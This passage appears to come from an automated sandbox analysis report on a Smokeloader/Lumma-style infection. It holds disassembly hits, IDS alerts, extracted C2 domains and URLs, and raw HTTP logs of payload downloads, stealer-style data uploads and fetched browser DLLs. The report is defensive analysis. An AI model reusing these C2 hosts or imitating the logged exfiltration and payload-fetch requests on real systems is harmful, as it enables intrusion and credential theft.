                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426271
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426284
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_004102B2
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]6_2_004164D2
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, 00008000h6_2_00403570
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp cl, 0000002Eh6_2_00421580
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]6_2_004025A0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h6_2_00414660
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edi, ebx6_2_00436670
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00431680
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]6_2_004106B1
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h6_2_004138D2
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_004248E0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_00423931
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_00423AD0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then jmp edx6_2_00422AFB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]6_2_00415AFA
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]6_2_0040CB10
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_0040FBB4
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then jmp edx6_2_0041CCD0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00425CEE
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_00423C97
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]6_2_00433D0A
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx esi, word ptr [ecx]6_2_00438F15
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then jmp edx6_2_0057D097
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx esi, word ptr [ecx]6_2_0059917C
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]6_2_00576248
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h6_2_005772C9
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]6_2_005772C9
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp cl, 0000002Eh6_2_005812E0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then dec edx6_2_0059B2B7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_005863DB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_005864D8
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_005864EB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_00570519
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]6_2_005875BA
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]6_2_005875BA
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]6_2_00576739
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, 00008000h6_2_005637D7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]6_2_00562807
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edi, ebx6_2_005968D7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h6_2_005748C7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_005918E7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]6_2_00570918
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00576B56
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_00584B47
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]6_2_00564BD7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_00584B47
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00569BC7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00569BC7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_00583B98
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A0h]6_2_00581C89
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then jmp edx6_2_00582D5B
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]6_2_0056CD77
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]6_2_00575D61
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]6_2_00593E13
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_0056FE1B
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_00583ECF
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_00583EFE
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00585F55
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 4x nop then jmp dword ptr [004421CCh]6_2_0057CF1A

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.4:55411 -> 1.1.1.1:53
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49760 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49761 -> 185.18.245.58:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.18.245.58 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 31.176.197.47 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:28:28 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:20:02 GMTConnection: keep-aliveETag: "6652f0b2-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:28:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:26:18 GMTETag: "205e00-6195727a15e80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 23.199.218.33 23.199.218.33
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: UNINETAZ UNINETAZ
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3789Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 548841Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 7497Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
